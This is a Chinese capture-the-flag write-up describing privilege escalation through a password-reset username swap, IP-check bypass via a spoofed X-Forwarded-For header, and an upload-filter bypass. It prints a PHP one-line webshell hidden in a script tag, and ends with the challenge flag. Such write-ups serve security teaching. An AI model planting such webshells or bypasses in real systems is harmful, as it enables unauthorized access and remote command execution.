前言
越权渗透是指黑客利用系统漏洞或者密码破解等手段,未经授权地进入目标系统获得权限。具体而言,越权渗透可以包括以下几种形式:
-
弱口令攻击:黑客通过暴力破解或者社工攻击等手段获取系统账号和密码,从而进入目标系统。
-
缓冲区溢出攻击:黑客利用系统中存在的缓冲区溢出漏洞,向目标系统注入恶意代码,从而获得系统权限。
-
SQL注入攻击:黑客利用目标系统中存在的SQL注入漏洞,通过注入恶意SQL语句获取系统权限。
基本流程案例如下:
-
收集信息:黑客先通过信息搜集技术,获取目标系统的基本信息,包括IP地址、端口、服务等。
-
扫描目标:黑客通过端口扫描、漏洞扫描等技术,寻找目标系统中存在的漏洞和弱点。
-
获取权限:黑客利用发现的漏洞和弱点,进入目标系统,获取管理员或其他高权限账号。
-
掩盖痕迹:黑客在获取权限后,会尽可能地删除遗留的痕迹,包括日志记录和其他操作痕迹。
-
利用权限:黑客利用获取到的管理员或其他高权限账号,修改系统设置、获取重要数据等。
-
持久化攻击:黑客在获取权限后,会留下后门等恶意程序,以保持对目标系统的控制。
以上流程仅供参考,实际攻击可能会因系统环境、攻击者技术水平等因素而有所不同。
一、bug
1.题目
2.答题
2.1 垂直越权
打开链接发现注册,和找回密码,这应该就是越权
随便注册一个
回去进行登录,登录成功后,点击管理发现没权限
尝试越权修改密码 ,发现登录以后修改密码,不会带username
想到开始页面也有一个修改密码,这里有一个username,改为admin
进行admin登录
2.2 IP绕过
继续尝试访问manage页面,但提示ip不允许
尝试通过x-forwarded-for:127.0.0.1来伪造ip
查看源码
ctf总共就几个知识点,猜测xss,sql,ssrf,upload
index.php?module=filemanage&do=upload
访问得到上传文件页面
2.3 文件上传
直接上传图片马,连.png结尾的都上传不了,说明服务器会对图片内容进行检测。
1.mime检测;
2.大小写绕过;
3.等价替换(php5,php3)
4.也是本题的考点,利用JavaScript执行php代码(正常的php代码会被检测到,所以就考虑用JavaScript来执行)
<script language="php"> @eval$_POST['cmd']); </script>
得到flag:cyberpeace{e47728885a9e63d080b7c0d008dceb0a}